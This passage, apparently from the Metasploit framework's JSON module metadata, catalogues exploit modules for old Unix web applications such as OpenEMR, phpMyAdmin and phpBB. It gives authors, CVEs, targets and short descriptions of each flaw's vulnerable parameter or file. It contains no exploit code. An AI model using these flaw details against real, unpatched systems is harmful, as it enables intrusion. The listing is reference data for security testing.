"author": [
"Daniel Compton <daniel.compton@ngssecure.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Nagios XI Network Monitor's\n component 'Graph Explorer'. An authenticated user can execute system commands\n by injecting them into several parameters, such as visApi.php's 'host' parameter,\n which results in remote code execution.",
"references": [
"OSVDB-83552",
"BID-54263",
"PACKETSTORM-118497"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Graph Explorer Component prior to 1.3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/nagios_graph_explorer.rb",
"is_install_path": true,
"ref_name": "unix/webapp/nagios_graph_explorer",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/narcissus_backend_exec": {
"name": "Narcissus Image Configuration Passthru Vulnerability",
"full_name": "exploit/unix/webapp/narcissus_backend_exec",
"rank": 600,
"disclosure_date": "2012-11-14",
"type": "exploit",
"author": [
"Dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Narcissus image configuration\n function. This is due to the backend.php file not handling the $release parameter\n properly before passing it on to the configure_image() function. In this\n function, the $release parameter can be used to inject system commands for\n passthru (a PHP function that's meant to be used to run a bash script by the\n vulnerable application), which allows remote code execution under the context\n of the web server.",
"references": [
"EDB-22709",
"OSVDB-87410"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Narcissus"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/narcissus_backend_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/narcissus_backend_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/open_flash_chart_upload_exec": {
"name": "Open Flash Chart v2 Arbitrary File Upload",
"full_name": "exploit/unix/webapp/open_flash_chart_upload_exec",
"rank": 500,
"disclosure_date": "2009-12-14",
"type": "exploit",
"author": [
"Braeden Thomas",
"Gjoko Krstic <gjoko@zeroscience.mk>",
"Halim Cruzito",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability found in Open Flash\n Chart version 2. Attackers can abuse the 'ofc_upload_image.php' file\n in order to upload and execute malicious PHP files.",
"references": [
"BID-37314",
"CVE-2009-4140",
"OSVDB-59051",
"EDB-10532",
"WPVDB-6787",
"WPVDB-6788",
"WPVDB-6789",
"WPVDB-6790",
"WPVDB-6791",
"WPVDB-6792"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/open_flash_chart_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/open_flash_chart_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openemr_sqli_privesc_upload": {
"name": "OpenEMR 4.1.1 Patch 14 SQLi Privilege Escalation Remote Code Execution",
"full_name": "exploit/unix/webapp/openemr_sqli_privesc_upload",
"rank": 600,
"disclosure_date": "2013-09-16",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in OpenEMR version 4.1.1 Patch 14 and lower.\n When logging in as any non-admin user, it's possible to retrieve the admin SHA1 password\n hash from the database through SQL injection. The SQL injection vulnerability exists\n in the \"new_comprehensive_save.php\" page. This hash can be used to log in as the admin\n user. After logging in, the \"manage_site_files.php\" page will be used to upload arbitrary\n code.",
"references": [
"OSVDB-97482",
"EDB-28329"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpenEMR"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/openemr_sqli_privesc_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openemr_sqli_privesc_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openemr_upload_exec": {
"name": "OpenEMR PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/openemr_upload_exec",
"rank": 600,
"disclosure_date": "2013-02-13",
"type": "exploit",
"author": [
"Gjoko Krstic <gjoko@zeroscience.mk>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the\n ofc_upload_image.php file from the openflashchart library, a malicious user can\n upload a file to the tmp-upload-images directory without any authentication, which\n results in arbitrary code execution. The module has been tested successfully on\n OpenEMR 4.1.1 over Ubuntu 10.04.",
"references": [
"CVE-2009-4140",
"OSVDB-90222",
"BID-37314",
"EBD-24492",
"URL-http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php",
"URL-http://www.open-emr.org/wiki/index.php/OpenEMR_Patches"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpenEMR 4.1.1"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/unix/webapp/openemr_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openemr_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/opensis_modname_exec": {
"name": "OpenSIS 'modname' PHP Code Execution",
"full_name": "exploit/unix/webapp/opensis_modname_exec",
"rank": 600,
"disclosure_date": "2012-12-04",
"type": "exploit",
"author": [
"EgiX",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in OpenSIS\n versions 4.5 to 5.2 which allows any authenticated user to execute\n arbitrary PHP code under the context of the web-server user.\n The 'ajax.php' file calls 'eval()' with user controlled data from\n the 'modname' parameter.",
"references": [
"CVE-2013-1349",
"OSVDB-100676",
"URL-http://karmainsecurity.com/KIS-2013-10",
"URL-http://sourceforge.net/p/opensis-ce/bugs/59/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpenSIS version 4.5 to 5.2"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/opensis_modname_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/opensis_modname_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openview_connectednodes_exec": {
"name": "HP Openview connectedNodes.ovpl Remote Command Execution",
"full_name": "exploit/unix/webapp/openview_connectednodes_exec",
"rank": 600,
"disclosure_date": "2005-08-25",
"type": "exploit",
"author": [
"Valerio Tesei <valk@mojodo.it>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n HP OpenView connectedNodes.ovpl CGI application. The results of the command\n will be displayed to the screen.",
"references": [
"CVE-2005-2773",
"OSVDB-19057",
"BID-14662"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/openview_connectednodes_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openview_connectednodes_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/openx_banner_edit": {
"name": "OpenX banner-edit.php File Upload PHP Code Execution",
"full_name": "exploit/unix/webapp/openx_banner_edit",
"rank": 600,
"disclosure_date": "2009-11-24",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the OpenX advertising software.\n In versions prior to version 2.8.2, authenticated users can upload files\n with arbitrary extensions to be used as banner creative content. By uploading\n a file with a PHP extension, an attacker can execute arbitrary PHP code.\n\n NOTE: The file must also return either \"png\", \"gif\", or \"jpeg\" as its image\n type as returned from the PHP getimagesize() function.",
"references": [
"CVE-2009-4098",
"OSVDB-60499",
"BID-37110",
"URL-http://archives.neohapsis.com/archives/bugtraq/2009-11/0166.html",
"URL-http://www.openx.org/docs/2.8/release-notes/openx-2.8.2",
"URL-http://php.net/manual/en/function.getimagesize.php",
"URL-http://gynvael.coldwind.pl/?id=223",
"URL-http://gynvael.coldwind.pl/?id=224",
"URL-http://gynvael.coldwind.pl/?id=235",
"URL-http://programming.arantius.com/the+smallest+possible+gif",
"URL-http://stackoverflow.com/questions/2253404/what-is-the-smallest-valid-jpeg-file-size-in-bytes"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/openx_banner_edit.rb",
"is_install_path": true,
"ref_name": "unix/webapp/openx_banner_edit",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/oracle_vm_agent_utl": {
"name": "Oracle VM Server Virtual Server Agent Command Injection",
"full_name": "exploit/unix/webapp/oracle_vm_agent_utl",
"rank": 600,
"disclosure_date": "2010-10-12",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a command injection flaw within Oracle's VM Server\n Virtual Server Agent (ovs-agent) service.\n\n By including shell meta characters within the second parameter to the 'utl_test_url'\n XML-RPC methodCall, an attacker can execute arbitrary commands. The service\n typically runs with root privileges.\n\n NOTE: Valid credentials are required to trigger this vulnerability. The username\n appears to be hardcoded as 'oracle', but the password is set by the administrator\n at installation time.",
"references": [
"CVE-2010-3585",
"OSVDB-68797",
"BID-44047"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 8899,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb",
"is_install_path": true,
"ref_name": "unix/webapp/oracle_vm_agent_utl",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/oscommerce_filemanager": {
"name": "osCommerce 2.2 Arbitrary PHP Code Execution",
"full_name": "exploit/unix/webapp/oscommerce_filemanager",
"rank": 600,
"disclosure_date": "2009-08-31",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "osCommerce is a popular open source E-Commerce application.\n The admin console contains a file management utility that\n allows administrators to upload, download, and edit files.\n This could be abused to allow unauthenticated attackers to\n execute arbitrary code with the permissions of the\n webserver.",
"references": [
"OSVDB-60018",
"EDB-9556"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/oscommerce_filemanager.rb",
"is_install_path": true,
"ref_name": "unix/webapp/oscommerce_filemanager",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/pajax_remote_exec": {
"name": "PAJAX Remote Command Execution",
"full_name": "exploit/unix/webapp/pajax_remote_exec",
"rank": 600,
"disclosure_date": "2006-03-30",
"type": "exploit",
"author": [
"Matteo Cantoni <goony@nothink.org>",
"hdm <x@hdm.io>"
],
"description": "RedTeam has identified two security flaws in PAJAX (<= 0.5.1).\n It is possible to execute arbitrary PHP code from unchecked user input.\n Additionally, it is possible to include arbitrary files on the server\n ending in \".class.php\".",
"references": [
"CVE-2006-1551",
"OSVDB-24618",
"BID-17519",
"URL-http://www.redteam-pentesting.de/advisories/rt-sa-2006-001.php"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/pajax_remote_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/pajax_remote_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_charts_exec": {
"name": "PHP-Charts v1.0 PHP Code Execution Vulnerability",
"full_name": "exploit/unix/webapp/php_charts_exec",
"rank": 600,
"disclosure_date": "2013-01-16",
"type": "exploit",
"author": [
"AkaStep",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a PHP code execution vulnerability in php-Charts\n version 1.0 which could be abused to allow users to execute arbitrary\n PHP code under the context of the webserver user. The 'url.php' script\n calls eval() with user controlled data from any HTTP GET parameter name.",
"references": [
"OSVDB-89334",
"BID-57448",
"EDB-24201"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/php_charts_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_charts_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_eval": {
"name": "Generic PHP Code Evaluation",
"full_name": "exploit/unix/webapp/php_eval",
"rank": 0,
"disclosure_date": "2008-10-13",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>"
],
"description": "Exploits things like <?php eval($_REQUEST['evalme']); ?>\n It is likely that HTTP evasion options will break this exploit.",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-14 09:54:22 +0000",
"path": "/modules/exploits/unix/webapp/php_eval.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_include": {
"name": "PHP Remote File Include Generic Code Execution",
"full_name": "exploit/unix/webapp/php_include",
"rank": 300,
"disclosure_date": "2006-12-17",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"egypt <egypt@metasploit.com>",
"ethicalhack3r"
],
"description": "This module can be used to exploit any generic PHP file include vulnerability,\n where the application includes code like the following:\n\n <?php include($_GET['path']); ?>",
"references": [
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/php_include.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_include",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_vbulletin_template": {
"name": "vBulletin misc.php Template Name Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/php_vbulletin_template",
"rank": 600,
"disclosure_date": "2005-02-25",
"type": "exploit",
"author": [
"str0ke <str0ke@milw0rm.com>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits an arbitrary PHP code execution flaw in\n the vBulletin web forum software. This vulnerability is only\n present when the \"Add Template Name in HTML Comments\" option\n is enabled. All versions of vBulletin prior to 3.0.7 are\n affected.",
"references": [
"CVE-2005-0511",
"BID-12622",
"OSVDB-14047"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/php_vbulletin_template.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_vbulletin_template",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/php_xmlrpc_eval": {
"name": "PHP XML-RPC Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/php_xmlrpc_eval",
"rank": 600,
"disclosure_date": "2005-06-29",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits an arbitrary code execution flaw\n discovered in many implementations of the PHP XML-RPC module.\n This flaw is exploitable through a number of PHP web\n applications, including but not limited to Drupal, Wordpress,\n Postnuke, and TikiWiki.",
"references": [
"CVE-2005-1921",
"OSVDB-17793",
"BID-14088"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/php_xmlrpc_eval.rb",
"is_install_path": true,
"ref_name": "unix/webapp/php_xmlrpc_eval",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/phpbb_highlight": {
"name": "phpBB viewtopic.php Arbitrary Code Execution",
"full_name": "exploit/unix/webapp/phpbb_highlight",
"rank": 600,
"disclosure_date": "2004-11-12",
"type": "exploit",
"author": [
"valsmith <valsmith@metasploit.com>",
"hdm <x@hdm.io>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits two arbitrary PHP code execution flaws in the\n phpBB forum system. The problem is that the 'highlight' parameter\n in the 'viewtopic.php' script is not verified properly and will\n allow an attacker to inject arbitrary code via preg_replace().\n\n This vulnerability was introduced in revision 3076, and finally\n fixed in revision 5166. According to the \"tags\" within their tree,\n this corresponds to versions 2.0.4 through 2.0.15 (inclusive).",
"references": [
"CVE-2005-2086",
"CVE-2004-1315",
"OSVDB-11719",
"OSVDB-17613",
"BID-14086",
"BID-10701"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"phpbb <=2.0.10",
"phpbb <=2.0.15"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/phpbb_highlight.rb",
"is_install_path": true,
"ref_name": "unix/webapp/phpbb_highlight",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/phpcollab_upload_exec": {
"name": "phpCollab 2.5.1 Unauthenticated File Upload",
"full_name": "exploit/unix/webapp/phpcollab_upload_exec",
"rank": 600,
"disclosure_date": "2017-09-29",
"type": "exploit",
"author": [
"Nicolas SERRA <n.serra@sysdream.com>",
"Nick Marcoccio \"1oopho1e\" <iremembermodems@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in phpCollab 2.5.1\n which could be abused to allow unauthenticated users to execute arbitrary code\n under the context of the web server user.\n\n The exploit has been tested on Ubuntu 16.04.3 64-bit",
"references": [
"CVE-2017-6090",
"EDB-42934",
"URL-http://www.phpcollab.com/",
"URL-https://sysdream.com/news/lab/2017-09-29-cve-2017-6090-phpcollab-2-5-1-arbitrary-file-upload-unauthenticated/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-01-10 17:38:52 +0000",
"path": "/modules/exploits/unix/webapp/phpcollab_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/phpcollab_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/phpmyadmin_config": {
"name": "PhpMyAdmin Config File Code Injection",
"full_name": "exploit/unix/webapp/phpmyadmin_config",
"rank": 600,
"disclosure_date": "2009-03-24",
"type": "exploit",
"author": [
"Greg Ose",
"pagvac",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a vulnerability in phpMyAdmin's setup\n feature which allows an attacker to inject arbitrary PHP\n code into a configuration file. The original advisory says\n the vulnerability is present in phpMyAdmin versions 2.11.x\n < 2.11.9.5 and 3.x < 3.1.3.1; this module was tested on\n 3.0.1.1.\n\n The file where our payload is written\n (phpMyAdmin/config/config.inc.php) is not directly used by\n the system, so it may be a good idea to either delete it or\n copy the running config (phpMyAdmin/config.inc.php) over it\n after successful exploitation.",
"references": [
"CVE-2009-1151",
"OSVDB-53076",
"EDB-8921",
"URL-http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php",
"URL-http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (phpMyAdmin 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1)"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/phpmyadmin_config.rb",
"is_install_path": true,
"ref_name": "unix/webapp/phpmyadmin_config",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/piwik_superuser_plugin_upload": {
"name": "Piwik Superuser Plugin Upload",
"full_name": "exploit/unix/webapp/piwik_superuser_plugin_upload",
"rank": 600,
"disclosure_date": "2017-02-05",
"type": "exploit",
"author": [
"FireFart"
],
"description": "This module will generate a plugin, pack the payload into it\n and upload it to a server running Piwik. Superuser Credentials are\n required to run this module. This module does not work against Piwik 1\n as there is no option to upload custom plugins. Piwik disabled\n custom plugin uploads in version 3.0.3. From version 3.0.3 onwards you\n have to enable custom plugin uploads via the config file.\n Tested with Piwik 2.14.0, 2.16.0, 2.17.1 and 3.0.1.",
"references": [
"URL-https://firefart.at/post/turning_piwik_superuser_creds_into_rce/",
"URL-https://piwik.org/faq/plugins/faq_21/",
"URL-https://piwik.org/changelog/piwik-3-0-3/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Piwik"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/piwik_superuser_plugin_upload.rb",
"is_install_path": true,
"ref_name": "unix/webapp/piwik_superuser_plugin_upload",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/projectpier_upload_exec": {
"name": "Project Pier Arbitrary File Upload Vulnerability",
"full_name": "exploit/unix/webapp/projectpier_upload_exec",
"rank": 600,
"disclosure_date": "2012-10-08",
"type": "exploit",
"author": [
"BlackHawk",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Project Pier. The application's\n uploading tool does not require any authentication, which allows a malicious user\n to upload an arbitrary file onto the web server, and then cause remote code\n execution by simply requesting it. This module is known to work against Apache\n servers due to the way it handles an extension name, but the vulnerability may\n not be exploitable on others.",
"references": [
"OSVDB-85881",
"EDB-21929",
"PACKETSTORM-117070"
],
"platform": "Linux,PHP",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/projectpier_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/projectpier_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/projectsend_upload_exec": {
"name": "ProjectSend Arbitrary File Upload",
"full_name": "exploit/unix/webapp/projectsend_upload_exec",
"rank": 600,
"disclosure_date": "2014-12-02",
"type": "exploit",
"author": [
"Fady Mohammed Osman",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ProjectSend\n revisions 100 to 561. The 'process-upload.php' file allows\n unauthenticated users to upload PHP files resulting in remote\n code execution as the web server user.",
"references": [
"EDB-35424"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ProjectSend (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/projectsend_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/projectsend_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/qtss_parse_xml_exec": {
"name": "QuickTime Streaming Server parse_xml.cgi Remote Execution",
"full_name": "exploit/unix/webapp/qtss_parse_xml_exec",
"rank": 600,
"disclosure_date": "2003-02-24",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "The QuickTime Streaming Server contains a CGI script that is vulnerable\n to metacharacter injection, allowing arbitrary commands to be executed as root.",
"references": [
"OSVDB-10562",
"BID-6954",
"CVE-2003-0050"
],
"platform": "Unix",
"arch": "cmd",
"rport": 1220,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/qtss_parse_xml_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/redmine_scm_exec": {
"name": "Redmine SCM Repository Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/redmine_scm_exec",
"rank": 600,
"disclosure_date": "2010-12-19",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Redmine repository controller. The flaw is triggered when a rev parameter\n is passed to the command line of the SCM tool without adequate filtering.",
"references": [
"CVE-2011-4929",
"OSVDB-70090",
"URL-http://www.redmine.org/news/49"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/redmine_scm_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/redmine_scm_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/seportal_sqli_exec": {
"name": "SePortal SQLi Remote Code Execution",
"full_name": "exploit/unix/webapp/seportal_sqli_exec",
"rank": 600,
"disclosure_date": "2014-03-20",
"type": "exploit",
"author": [
"jsass",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in SePortal version 2.5.\n When logging in as any non-admin user, it's possible to retrieve the admin session\n from the database through SQL injection. The SQL injection vulnerability exists\n in the \"staticpages.php\" page. This hash can be used to take over the admin\n user session. After logging in, the \"/admin/downloads.php\" page will be used\n to upload arbitrary code.",
"references": [
"CVE-2008-5191",
"OSVDB-46567",
"EDB-32359"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SePortal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/seportal_sqli_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/seportal_sqli_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/simple_e_document_upload_exec": {
"name": "Simple E-Document Arbitrary File Upload",
"full_name": "exploit/unix/webapp/simple_e_document_upload_exec",
"rank": 600,
"disclosure_date": "2014-01-23",
"type": "exploit",
"author": [
"vinicius777 <vinicius777@gmail.com>",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability found in Simple\n E-Document versions 3.0 to 3.1. Attackers can bypass authentication and\n abuse the upload feature in order to upload malicious PHP files which\n results in arbitrary remote code execution as the web server user. File\n uploads are disabled by default.",
"references": [
"EDB-31142"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/simple_e_document_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/sixapart_movabletype_storable_exec": {
"name": "SixApart MovableType Storable Perl Code Execution",
"full_name": "exploit/unix/webapp/sixapart_movabletype_storable_exec",
"rank": 400,
